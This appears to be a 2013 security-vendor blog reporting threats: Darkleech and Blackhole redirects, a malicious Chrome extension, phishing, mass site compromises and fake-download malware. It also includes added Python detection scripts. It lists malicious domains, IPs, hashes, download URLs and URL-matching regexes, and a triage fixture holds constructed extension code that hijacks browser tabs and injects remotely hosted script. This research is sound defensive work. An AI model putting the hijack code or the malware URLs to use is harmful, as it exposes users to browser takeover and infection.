Tuesday, May 21, 2013

Darkleech attack continues to grow

The Apache Darkleech attack has been in the news for quite some time now. The first compromise that we identified in our transactions dates back to mid-March. Darkleech (frequently reported alongside the Linux/Cdorked Apache backdoor) injects malicious redirections into a website that lead to a Blackhole exploit kit (BEK) landing page. Sucuri published a great write-up about the Darkleech infection mechanism on the server side.

We are currently observing a considerable rise in websites compromised by this attack. The infected websites redirect to a version of the Blackhole Exploit Kit v2. We identified the following sites as compromised in the past week within observed Zscaler traffic:

202.218.253.214
bazzillbasics.com
bigfishermanseafood.com
clasificados.zocalo.com.mx
colima.vendidoalas3.com.mx
embarque.com
kimindschool.com
mapas.guiaroji.com.mx
mediagazer.com
middleschoolbook.com
mpsrail.co.uk
new.schoolnotes.com
newsofthepast.com
norwalkmedicalgroup.com
reports.valeopartners.com
studioartsdallas.com
unit2.euro2day.gr
v2.wallpaperzip.com
www.264thegrill.com
www.acadianabusiness.com
www.alancristea.com
www.aqua-medic.com
www.aquapurawater.ca
www.backroads.org
www.beachcamsusa.com
www.bsgco.com
www.chicagohomeestates.com
www.compactpowercenter.com
www.companyrescue.co.uk
www.eastpak.com
www.euro2day.gr
www.flowersandservices.com
www.fortworthzoocoupons.net
www.freedieting.com
www.gite-mer.com
www.grandlifehotels.com
www.jackshainman.com
www.momentumtraining.biz
www.nevadasecuritylicense.com
www.qualityenvironmental.co.uk
www.ranabroadband.net
www.rentalsource.com
www.servo2go.com
www.superiorvalves.com
www.theacme.com
www.trulia.com
www.vbbound.com
www.visit-montenegro.com
www.volpifoods.com

The following IPs and hostnames were observed serving the Blackhole Exploit Kit landing page:

129.121.101.227
129.121.104.90
129.121.108.220
129.121.113.217
129.121.120.211
129.121.168.226
129.121.194.244
129.121.199.90
129.121.201.230
129.121.45.181
129.121.55.185
129.121.61.189
129.121.65.124
129.121.85.166
143.95.13.5
143.95.1.6
143.95.17.5
143.95.1.8
143.95.2.6
143.95.7.6
149.47.113.128
149.47.149.225
149.47.154.201
149.47.205.179
149.47.21.162
149.47.218.128
149.47.22.176
149.47.225.171
149.47.245.128
173.233.133.30
173.233.133.43
173.233.134.138
173.244.221.89
174.37.210.122
174.37.210.127
208.166.50.27
208.43.236.169
208.69.183.138
208.69.183.205
209.126.248.63
216.154.208.125
64.247.176.220
64.247.180.106
65.75.145.203
65.75.168.252
65.75.174.197
65.75.176.120
65.75.184.70
65.75.185.243
65.75.188.211
65.75.190.59
67.213.213.23
69.89.4.92
69.89.5.224
69.89.9.47
adanakenthaber.com
aftabcurrency.eu
akmusik.org
alzagh.com
aminexchange.net
austriawanderer.com
basquet-atletico.lendanearlongisland.com
boomchoon.co.uk
budgettyremaintenance.co.uk
cariparker.co.uk
cinselmarket.org
countryandleisureclothing.co.uk
egyptwanderer.com
elkadytrans.com
firstbytemicro.com
foryouroccasions.co.uk
georgemediahouse.co.uk
gheep.co.uk
gshcontracts.co.uk
hcxmy.com
hungarywanderer.com
lcwceramics.co.uk
leventerkekkuaforu.com
lovehost.co.uk
moneystopltd.co.uk
mpsrail.co.uk
mtlssc.org.uk
ondervreemdevlag.nl
partitioningsoutheast.co.uk
platjadarovirtual.com
rika.100pixels.co.uk
sms.nozom.com.eg
teddyrepair.co.uk
upminstercontainers.com
wallpapers.animalz.gr
wcwr.co.uk

The landing-page URLs followed this pattern, a 16 to 32 character alphanumeric directory followed by q.php:

\/[a-z0-9]{16,32}\/q.php

We also identified the following user-agent strings on requests made when the redirection occurred. These are the Java runtime's own User-Agent strings, i.e. the Java plug-in rather than the browser fetching content from the landing page:

Java/1.6.0_26
JNLP/1.7.0 javaws/10.21.2.11 () Java/1.7.0_21
JNLP/6.0 javaws/1.6.0_03 (b05) Java/1.6.0_03
JNLP/6.0 javaws/1.6.0_26 (b03) Java/1.6.0_26

The browser user agents seen visiting the infected sites were mainly Internet Explorer 7, 8 and 9 (MSIE_7_X, MSIE_8_X and MSIE_9_X).

Upon visiting an infected website, the victim is redirected to a standard BEK v2 landing page, shown below.


The exploit code on the landing page targets vulnerabilities in multiple browser plug-ins, including Adobe Reader (PDF) and Java, when they are loaded in IE, giving the attacker code execution in the context of the plug-in. Deobfuscating the PDF exploit reveals the final URL used to fetch the payload, as shown in the image below. At the time of writing, however, that URL returned a 404, so it was not possible to retrieve the malicious binary.


Upon revisiting some of these compromised websites, we found that the pages were no longer serving the injected code. This provides a clue: the attackers probably pick random sites running Apache web servers that are susceptible to Darkleech, infect them only for a brief period, and then clean them up. This makes tracking Darkleech infections a challenging task: a site that is clean when you check it may well have been serving redirects an hour earlier, so historical proxy logs are a better source than live re-crawls. For further details on the vulnerability and how the server can be patched, please refer to CVE-2012-1557.

Thursday, May 16, 2013

Fake YouTube page targets Chrome users

Fake YouTube pages are one of the favored ways attackers get users to click on malicious content. These fake pages often look the same, but the source code can reveal a new twist. This time, a recently encountered fake YouTube page hosted at http://facebook-java.com targets Google Chrome users only.

Fake YouTube page

We have found many malicious sites that specifically target Internet Explorer or Firefox users, but rarely ones targeting Google Chrome users. In this example, any click on the fake video player or the fake ad attempts to install the following Google Chrome extension: https://chrome.google.com/webstore/detail/nhmibhinlbilhaflldckbeokphjoifhi.


JavaScript code that installs a Chrome extension


You may have noticed that the extension is hosted in the official Chrome Web Store. Google disabled the installation of extensions from third-party sites in June 2012, and silent installs in late 2012, so getting the extension into the store is what makes a one-click install from facebook-java.com possible at all.

The Chrome store page does not show any information about the extension:


Let's install the extension pushed by http://facebook-java.com/.

List of permissions requested by the extension
A new icon is added next to the URL bar:
Clicking the icon leads to http://www.getjava.net/, which shows the same page as facebook-java.com. It tries to install another extension from the Chrome store, but that one has already been removed.

getjava.net
Now that the extension is installed, it is no longer possible to open Tools or Settings in Chrome. Instead, whenever one of those functions is accessed, the tab is redirected to https://www.facebook.com/?get_cod. The corresponding code in the malicious extension shows how this is done:

Overrides any tab with a URL starting with chrome://
From then on, four different malicious scripts are inserted into every web page viewed. The author uses the Google URL shortener to reference the malicious JavaScript:
  • http://goo.gl/9Ky9t => http://profonixcoder.com/yeni/pro.php
  • http://goo.gl/gQhF6 => http://profonixcoder.com/yeni/twitter.php (down)
  • http://goo.gl/t7snI => http://profonixcoder.com/yeni/youtube.php (down)
  • http://goo.gl/jUEgY => http://profonixcoder.com/yeni/askfm.php (down)
Only the first script is currently available. It runs on Facebook pages and shares links using the victim's account. Judging by the names of the other files, we can assume they do something similar on YouTube, Twitter and Ask.fm.

It looks like the author of this malicious extension doesn't think much of Google's security, given that Google hosts the extension and Google's own URL shortener is used to pull in the malicious JavaScript.
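
The behaviour described above (a background script that hijacks chrome:// tabs, plus content scripts that pull JavaScript from a URL shortener into every page) is exactly what a quick manifest-and-source triage of an unpacked extension should catch. The script below is an added example, my own code rather than anything from the post or the extension; the manifest, permission list and JavaScript are constructed to mirror the post's description (the real extension's files and permissions are not reproduced here), and only the two URLs are the ones quoted above:

```python
import re
from urllib.parse import urlsplit

# Constructed manifest and scripts modelled on the behaviour described above.
# The extension's real name, files and permission list are not reproduced here;
# the two URLs are the ones quoted in the post.
SAMPLE_MANIFEST = {
    "manifest_version": 2,
    "name": "Video Plugin",                     # hypothetical
    "version": "1.0",
    "permissions": ["tabs", "<all_urls>"],     # assumed; the post shows them only as an image
    "background": {"scripts": ["background.js"]},
    "content_scripts": [{"matches": ["<all_urls>"], "js": ["inject.js"]}],
}
SAMPLE_FILES = {
    "background.js": """
chrome.tabs.onUpdated.addListener(function (tabId, info, tab) {
  if (tab.url && tab.url.indexOf('chrome://') === 0) {
    chrome.tabs.update(tabId, {url: 'https://www.facebook.com/?get_cod'});
  }
});
""",
    "inject.js": """
var s = document.createElement('script');
s.src = 'http://goo.gl/9Ky9t';
document.body.appendChild(s);
""",
}

BROAD_MATCHES = {'<all_urls>', '*://*/*', 'http://*/*', 'https://*/*'}
SHORTENERS = {'goo.gl', 'bit.ly', 't.co', 'tinyurl.com'}
REMOTE_SRC = re.compile(r'''\.src\s*=\s*['"](https?://[^'"]+)['"]''')
TAB_CONTROL = re.compile(r'chrome\.tabs\.(?:update|onUpdated)')


def triage(manifest, files):
    """Return human-readable findings for an unpacked extension (manifest dict,
    {filename: source} dict). An empty list means nothing suspicious was seen."""
    findings = []
    perms = set(manifest.get('permissions', []))
    if 'tabs' in perms and perms & BROAD_MATCHES:
        findings.append('manifest: "tabs" permission combined with access to all hosts')
    for cs in manifest.get('content_scripts', []):
        if set(cs.get('matches', [])) & BROAD_MATCHES:
            findings.append('manifest: content script(s) %s injected into every page'
                            % ', '.join(cs.get('js', [])))
    for name, src in files.items():
        # Redirecting chrome:// tabs keeps the user away from Settings and
        # chrome://extensions, the trick described in the post.
        if 'chrome://' in src and TAB_CONTROL.search(src):
            findings.append('%s: intercepts chrome:// pages (settings/extensions hijack)' % name)
        # A script element with a remote src means the real payload lives on a
        # server the attacker can change after the store review.
        for url in REMOTE_SRC.findall(src):
            host = (urlsplit(url).hostname or '').lower()
            via = 'URL shortener' if host in SHORTENERS else 'remote host'
            findings.append('%s: loads script from %s (%s)' % (name, url, via))
    return findings


if __name__ == '__main__':
    for line in triage(SAMPLE_MANIFEST, SAMPLE_FILES):
        print('-', line)
```

The checks are deliberately string-based rather than a full JavaScript parse: a first pass over a .crx only needs to flag the combination of broad host access, chrome:// interception and remotely loaded code, and the shortener check matters because a goo.gl link hides the final host from anyone reading the manifest or the store listing.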

Tuesday, May 7, 2013

Facebook Scam for Stalkers

If you are like me, you might feel bad about leaving your dog home alone all day while you are at work. So to alleviate his boredom, I let him sign up for his own Facebook account. Being new to the social media scene has already resulted in one tragedy, and now my dog has done it again. This time he was paranoid about whether his girlfriend from across the street was cheating on him, so of course when he saw the new FBStalker26.com, he had to try it.

On Version 26! So Advanced. So Legit.
Being human, I know this is obviously a phishing attempt, trying to trick my dog into revealing his Facebook username and password, or worse. A Facebook scam's success usually hinges on paranoia about who is looking at your profile, or on how many free iPads you can win. Once you realize that, these phishing attempts are almost elementary to recognize.

Always look at the address bar before entering your creds.
The link from that photo takes you straight to a new page where you are meant to log in again with your Facebook credentials. A quick glance at the address bar will show you that you are not in Kansas anymore. Don't do it! Don't enter that information!



Oh no, you did it... Now your username and password have been compromised. Even so, the attackers won't have an easy time getting into your account, thanks to Facebook's additional security checks. Unfortunately, my dog was gullible enough to also enter his security question and answer, only to be greeted by a 404 error immediately after submitting his data. Looks like he'll never find out who is stalking him, but don't worry... he won't have access to his own Facebook account for much longer.

Monday, May 6, 2013

Popular Media Sites Involved in Mass Compromise

Update (May 9): OSIRT had the opportunity to review the infected web app code for one of the compromised sites and has a great write-up to explain what was happening from a server-side vantage point.

Today, Zscaler identified yet another mass website compromise, this one impacting a number of popular media sites, including two radio stations in Washington, DC - Federal News Radio and WTOP. It's not clear if all of the sites impacted were leveraging a common backend platform that may have led to the compromise.

Sadly, mass compromises are now the norm. Attacks targeting end users generally involve some form of social engineering, whereby the potential victim must be convinced to visit a site, download a file, etc. Attackers therefore write scripts that comb the web looking for popular sites exposing a common flaw and, when one is identified, inject a single line of malicious code into the site. That way, any user visiting the otherwise legitimate (but now infected) site can become a victim. This particular threat also displays another common trait: it is dynamic in nature and only delivers content if the victim's browser exhibits certain attributes. In this case, the injected content is only served when the browser's User-Agent string reveals that Internet Explorer (IE) is being used, so a crawler or analyst fetching the page with any other User-Agent will see a clean page. When IE is used to view one of the infected pages, the following code is sent to the browser:


Obfuscated JavaScript injected into a webpage at WTOP.com
Deobfuscated version of the injected code
This obfuscated JavaScript decodes to an iframe pointing to hostnames registered with dynamic DNS providers. Thus far, we have identified two dynamic DNS domains (myftp.biz and hopto.org) involved, and the actual URLs (which are numerous) conform to the following pattern, a 14 or 15 character alphanumeric directory followed by a 32 character one:

   \/[a-z0-9]{14,15}\/[a-z0-9]{32}\/
Example URL
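
Both this post and the Darkleech post above give a URL pattern (here the dynamic DNS iframe target, there the /[a-z0-9]{16,32}/q.php Blackhole landing page, along with the Java user agents seen during the redirect). The script below is an added example, my own code rather than anything from the posts, that turns those two patterns into a scan over proxy log lines, with the Java User-Agent used only to strengthen a path hit. The log lines and hostnames are constructed for the example; they are not taken from Zscaler traffic:

```python
import re
from urllib.parse import urlsplit

# Constructed sample proxy log: "timestamp client method url \"user-agent\"".
# The hostnames are placeholders; the URL paths follow the two patterns quoted
# in the posts. None of these lines come from real traffic.
SAMPLE_LOG = """\
2013-05-20T10:01:02 10.0.0.5 GET http://compromised-site.test/index.html "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)"
2013-05-20T10:01:03 10.0.0.5 GET http://landing.test/a1b2c3d4e5f6a7b8c9d0e1f2/q.php "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)"
2013-05-20T10:01:05 10.0.0.5 GET http://landing.test/a1b2c3d4e5f6a7b8c9d0e1f2/q.php?jnlp=1 "JNLP/6.0 javaws/1.6.0_26 (b03) Java/1.6.0_26"
2013-05-20T10:02:00 10.0.0.7 GET http://xyz123abc456de.hopto.org/k3n9ta7fq2pbxv8/0123456789abcdef0123456789abcdef/ "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
2013-05-20T10:03:00 10.0.0.9 GET http://www.benign.test/q.php "Mozilla/5.0 (Windows NT 6.1) Firefox/20.0"
"""

LINE_RE = re.compile(r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>\S+) (?P<url>\S+) "(?P<ua>[^"]*)"$')

# Darkleech -> Blackhole v2 landing page: /<16-32 alphanumerics>/q.php (the post's
# regex with the '.' escaped and anchored to the end of the path).
BEK_PATH = re.compile(r'/[a-z0-9]{16,32}/q\.php$')
# Mass-compromise iframe target: /<14-15 alphanumerics>/<32 alphanumerics>/ on a
# hostname under one of the two dynamic DNS domains named in the post.
DDNS_PATH = re.compile(r'/[a-z0-9]{14,15}/[a-z0-9]{32}/')
DDNS_DOMAINS = ('.myftp.biz', '.hopto.org')
# The Java runtime's own User-Agent, i.e. the plug-in fetching exploit content.
JAVA_UA = re.compile(r'^(?:Java|JNLP)/')


def classify(url, ua):
    """Return the list of indicators that match one request (empty if none)."""
    parts = urlsplit(url)
    host = (parts.hostname or '').lower()
    hits = []
    if BEK_PATH.search(parts.path):
        hits.append('bek2_landing_path')
    if host.endswith(DDNS_DOMAINS) and DDNS_PATH.search(parts.path):
        hits.append('ddns_iframe_target')
    # A Java UA alone is normal (JNLP apps, updaters); it only strengthens a
    # path hit, so it is reported as a qualifier rather than on its own.
    if hits and JAVA_UA.match(ua):
        hits.append('java_runtime_ua')
    return hits


def scan(log_text):
    """Scan proxy log text; return one finding per matching line."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than abort the whole scan
        hits = classify(m['url'], m['ua'])
        if hits:
            findings.append({'line': lineno, 'client': m['client'],
                             'url': m['url'], 'indicators': hits})
    return findings


if __name__ == '__main__':
    for f in scan(SAMPLE_LOG):
        print("line %d: %s -> %s [%s]" % (f['line'], f['client'], f['url'], ', '.join(f['indicators'])))
```

Because the compromised sites are cleaned up quickly, the useful output is the client address and the time of the landing-page hit: that is what lets you go back and find which referring site the same client was on a second earlier, which is the page that actually carried the injected code.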

Once redirected to the malicious URLs, the victim is served Fake AntiVirus scams and the ZeroAccess Trojan. MD5s for the malware delivered include the following:

2e1997982c4dde48a995df5061f1438f
2b150bd07bb74426d676d8cb47451fd0
62547040ac637b63c2d531e17438597a
8858050e303cca778e5083ed4e442763
eee9941e4d01b65061f4fb621b2d708d
b43c1d19d35e3606a7b6227cef561986

Thus far, Zscaler has identified the following compromised sites:
 
Media Sites
  • WTOP Radio (Washington, DC) - wtop.com
  • Federal News Radio (Washington, DC) - federalnewsradio.com
  • The Christian Post - christianpost.com
  • Real Clear Science - realclearscience.com
  • Real Clear Policy - realclearpolicy.com
Others
  • scubaboard.com
  • mrsec.com
  • menupix.com
  • xaxor.com
  • gvovideo.com
At the time of posting, these compromised sites were still offering up malicious content.

Friday, May 3, 2013

Fake Flash player on Dropbox

Fake Flash updates are a very popular trick among attackers to fool users into downloading and installing malware. This week we found three websites distributing Win32.Sanity.N malware disguised as Flash updates:

  • hxxp://kivancoldu.com/, redirects to hxxp://click-videox.com/

http://kivancoldu.com on 05/02/2013
  • hxxp://fastcekim.com/, redirects to hxxp://click-videox.com/
  • hxxp://kivanctatlitug.tk/ (down)
hxxp://kivanctatlitug.tk/
The fake warning at the top of the page alternates between English and Turkish.

What is interesting is that the malicious executables are actually hosted in a Dropbox account and have not been taken down since they were found about seven days ago. I have spotted two different executables so far:
These two files behave similarly. They disable a number of Windows protections: UAC, the Windows Firewall, AV, Safe Boot, etc. The malware then drops variants of the Sality virus, some of which have a good detection rate among AV vendors.

Interestingly, there is a link on the malicious websites that shows how many people visited them: 1,412 unique visitors in a single day.

Another traffic report shows a second peak, with 1,700 visitors registered on 05/02... and counting.

These sites keep popping up, and they are still able to fool users.

Tuesday, April 30, 2013

More Fake SourceForge Websites Show Up

Two weeks ago we reported on a fake SourceForge website, sourceforgechile.net, which was used to distribute malware. We have since seen more of these fake sites this past week:
  • sourceforgebulgaria.net, registered on 05/06/2013
  • sourceforgesweden.net, registered on 05/06/2013
  • sourceforgecyprus.net, registered on 05/02/2013
  • sourceforgeniger.net, registered on 05/01/2013
  • sourceforgeestonia.net, registered on 04/26/2013
  • sourceforgegrenada.net, registered on 04/26/2013
  • sourceforgepalau.net, registered on 04/22/2013
  • sourceforgeecuador.net, registered on 04/21/2013
  • sourceforgeindiana.net, registered on 04/20/2013
  • sourceforgemorocco.net,  registered on 04/19/2013
  • sourceforgemyanmar.net ,  registered on 04/19/2013
  • sourceforgeyemen.net, registered on 04/06/2013
Each domain has been registered with different WHOIS information, but with the same registrar. All of them are unreachable today (DNS does not resolve).

We were, however, able to obtain two malicious files from these websites before they went dark:
  • http://sourceforgeestonia.net/minecraft_xray_texture_pack.exe
  • http://sourceforgeecuador.net/airport_firefighter_simulator.exe
The files are very similar to the malicious files from sourceforgechile.net which we analyzed earlier. They drop malicious binaries hidden in the Recycle Bin and are detected as the ZeroAccess Trojan.

It looks like the attacker is still registering new fake SourceForge websites. I'll update this post with new domains that I uncover going forward.

Friday, April 26, 2013

Scanning binaries for PE format anomalies


After processing tons of malicious binaries, I would like to share my findings about anomalies found in PE files. This anomaly information should be helpful to security researchers for validating suspicious samples and for sample clustering.


1. Bytes near the entry point (EP)

Bytes at the entry point are a popular input for AV signatures, so I put this first. The most frequent EP byte string in the set was 81ec8001000053555633db57895c2418c74424103091400033, which is an ordinary compiler prologue (sub esp, 0x180 followed by register pushes and stack stores). The second was 60e803000000e9eb045d4555c3e801000000eb5dbbedffffff, a pushad followed by overlapping call/ret/jmp instructions, an anti-disassembly trick characteristic of packer stubs.





This finding is much in line with another piece of research at http://www.hexacorn.com/blog/2012/07/04/random-stats-from-300k-malicious-samples-entry-points/, which listed the following top-10 EP strings (sample count, then the first six bytes at the EP):

  35498 55 8B EC 6A FF 68
  22712 55 8B EC 83 C4 F0
  14775 55 8B EC 53 8B 5D
   7711 4D 5A 90 00 03 00
   6959 55 8B EC 83 C4 C4
   5775 4D 5A 50 00 02 00
   3497 55 8B EC 83 C4 F4
   3190 60 E8 00 00 00 00
   3080 83 7C 24 08 01 75
   2152 55 8B EC 83 C4 B4

Two things stand out in that list. 55 8B EC (push ebp; mov ebp, esp) is a normal function prologue and says little on its own, so it needs more context bytes to be useful as a signature. The entries beginning 4D 5A are the "MZ" DOS header magic: those samples have an AddressOfEntryPoint of 0, pointing at the start of the file rather than into any section, which is itself a strong anomaly worth a feature of its own.
2. Section names

I concatenated the section names of each sample into a single string. Here are the top ones:

 
UPX is still the favorite packer among malware writers, followed by UPack.


The figure above shows the distribution of section counts in descending order. Most malicious samples have 3 sections.

I also picked out some amusing section names in Chinese (approximate translations in parentheses):
天使免杀 (angel AV-evasion; 免杀 is slang for "undetected by AV")
天外来客 (visitor from beyond the sky)
黑教基地 (hacking-tutorial base)
荒山一鱼 (a fish on a barren mountain)
BY 小广 (by Xiao Guang)
放荡不羁挖出 (dug out, unrestrained)
木马彩衣 (the Trojan's coat of many colors)
牧民战天 (herdsmen battle the heavens)
傻傻 (silly)
狂少爷 (crazy young master)

Here is the longest one:

国庆专版祖国大寿祖国繁荣人民安康祝福大家身体健康工作顺利合家欢乐心想事成万事如意笑脸敬上.

Google Translate renders it roughly as:

National Day special edition: happy birthday to the motherland, may the motherland prosper and the people be well. I wish you all good health, success at work, a happy family, all wishes come true and good luck in everything. With a big smile!

3. Anomaly score

I defined about 10 anomaly features and summed them into a total anomaly score per sample.
The following is the score distribution.
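
To make the scoring concrete, here is an added example of a PE anomaly scorer. It is my own code, not the author's tooling, and its eight features are an illustrative set chosen to cover the observations in this post (entry-point bytes, packer section names, non-ASCII names, section counts, and an EP that points at the MZ header); the post does not enumerate the author's ten features. It builds three small PE32 images in memory as test fixtures, so it runs without any sample; the UPX-style stub bytes and the constructed layouts are approximations, not copied from real packers or malware:

```python
import struct

# IMAGE_SCN_* characteristics used below
SCN_CODE, SCN_INIT, SCN_UNINIT = 0x20, 0x40, 0x80
SCN_EXEC, SCN_READ, SCN_WRITE = 0x20000000, 0x40000000, 0x80000000
# Section names of common packers (UPX, Upack, ASPack, Petite, NsPack, MPRESS, VMProtect, Themida)
PACKER_SECTIONS = {'UPX0', 'UPX1', 'UPX2', '.Upack', '.ByDll', '.aspack', '.adata', '.petite',
                   '.nsp0', '.nsp1', '.nsp2', '.MPRESS1', '.MPRESS2', '.vmp0', '.vmp1', '.vmp2', '.themida'}


def parse_pe(data):
    """Minimal PE header parser: entry point RVA plus the section table."""
    if data[:2] != b'MZ':
        raise ValueError('not an MZ file')
    e_lfanew = struct.unpack_from('<I', data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b'PE\0\0':
        raise ValueError('bad PE signature')
    nsec = struct.unpack_from('<H', data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from('<H', data, e_lfanew + 20)[0]
    opt = e_lfanew + 24
    entry = struct.unpack_from('<I', data, opt + 16)[0]   # AddressOfEntryPoint
    sections = []
    for i in range(nsec):
        name, vsize, va, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(
            '<8sIIIIIIHHI', data, opt + opt_size + 40 * i)
        raw_name = name.rstrip(b'\0')
        sections.append({'name': raw_name.decode('utf-8', 'replace'), 'name_bytes': raw_name,
                         'va': va, 'vsize': vsize, 'raw': rawptr, 'rawsize': rawsize, 'chars': chars})
    return {'entry_point': entry, 'sections': sections}


def locate_rva(rva, sections):
    """Map an RVA to (file offset, section). Headers map 1:1 to the file; an RVA in a
    section's uninitialised tail has no file offset."""
    for s in sections:
        if s['va'] <= rva < s['va'] + max(s['vsize'], s['rawsize']):
            delta = rva - s['va']
            return (s['raw'] + delta if delta < s['rawsize'] else None), s
    if sections and rva < sections[0]['va']:
        return rva, None          # EP inside the headers (the "4D 5A ..." EP strings)
    return None, None


def analyze(data, ep_len=16):
    """Score a PE image: each anomaly feature below adds one point."""
    pe = parse_pe(data)
    secs = pe['sections']
    off, sec = locate_rva(pe['entry_point'], secs)
    ep_bytes = data[off:off + ep_len] if off is not None else b''
    feats = set()
    if sec is None:
        feats.add('ep_outside_sections')
    else:
        if not sec['chars'] & SCN_EXEC:
            feats.add('ep_in_non_executable_section')
        if sec is not secs[0]:
            feats.add('ep_not_in_first_section')
    if ep_bytes[:1] == b'\x60':                    # pushad: typical packer stub prologue
        feats.add('pushad_at_entry')
    for s in secs:
        if s['name'] in PACKER_SECTIONS:
            feats.add('packer_section_name')
        if s['chars'] & SCN_WRITE and s['chars'] & SCN_EXEC:
            feats.add('writable_executable_section')
        if s['rawsize'] == 0 and s['vsize'] > 0:   # empty on disk, filled at run time
            feats.add('empty_raw_nonempty_virtual')
        if any(b < 0x20 or b > 0x7E for b in s['name_bytes']):
            feats.add('non_ascii_section_name')
    if len(secs) < 2:
        feats.add('fewer_than_two_sections')
    return {'entry_point': pe['entry_point'], 'ep_bytes': ep_bytes.hex(),
            'sections': [s['name'] for s in secs], 'features': sorted(feats), 'score': len(feats)}


def build_pe(sections, entry_rva):
    """Build a minimal PE32 file in memory (constructed fixture, not a real sample).
    sections: list of (name, va, vsize, raw_bytes, characteristics)."""
    align = 0x200
    hdr = bytearray(0x200)
    hdr[:2] = b'MZ'
    struct.pack_into('<I', hdr, 0x3C, 0x40)                 # e_lfanew
    hdr[0x40:0x44] = b'PE\0\0'
    struct.pack_into('<HHIIIHH', hdr, 0x44, 0x14C, len(sections), 0, 0, 0, 224, 0x102)
    opt = 0x58
    struct.pack_into('<H', hdr, opt, 0x10B)                 # PE32 magic
    struct.pack_into('<I', hdr, opt + 16, entry_rva)        # AddressOfEntryPoint
    struct.pack_into('<III', hdr, opt + 28, 0x400000, 0x1000, align)  # ImageBase, alignments
    struct.pack_into('<I', hdr, opt + 60, 0x200)            # SizeOfHeaders
    body, ptr = bytearray(), 0x200
    for i, (name, va, vsize, raw, chars) in enumerate(sections):
        padded = raw + b'\0' * (-len(raw) % align)
        struct.pack_into('<8sIIIIIIHHI', hdr, opt + 224 + 40 * i, name.encode('utf-8'),
                         vsize, va, len(padded), ptr if padded else 0, 0, 0, 0, 0, chars)
        body += padded
        ptr += len(padded)
    return bytes(hdr + body)


# Constructed fixtures: a plain compiler layout (EP bytes from the hexacorn list), a UPX-style
# layout (empty UPX0, approximate pushad/mov esi stub in UPX1) and an EP pointing at the MZ header.
CLEAN_SECTIONS = [('.text', 0x1000, 0x100, bytes.fromhex('558bec83c4f0c3'), SCN_CODE | SCN_EXEC | SCN_READ),
                  ('.data', 0x2000, 0x100, b'\0' * 16, SCN_INIT | SCN_READ | SCN_WRITE)]
CLEAN = build_pe(CLEAN_SECTIONS, 0x1000)
HEADER_EP = build_pe(CLEAN_SECTIONS, 0)
UPX_LIKE = build_pe([('UPX0', 0x1000, 0x1000, b'', SCN_UNINIT | SCN_EXEC | SCN_READ | SCN_WRITE),
                     ('UPX1', 0x2000, 0x200, bytes.fromhex('60be001040008dbe00f0ffff'),
                      SCN_CODE | SCN_EXEC | SCN_READ | SCN_WRITE)], 0x2000)

if __name__ == '__main__':
    for label, img in (('clean', CLEAN), ('upx-like', UPX_LIKE), ('header-ep', HEADER_EP)):
        print(label, analyze(img))
```

The features are binary and unweighted on purpose: that keeps the score explainable (a 5 means five named things are wrong with the file) and makes it usable as a clustering key, since samples from one packer or builder tend to trip the same subset. Mapping the EP through the section table rather than trusting the first section is what lets the scorer reproduce the hexacorn "4D 5A" entries as a distinct feature instead of treating them as a signature.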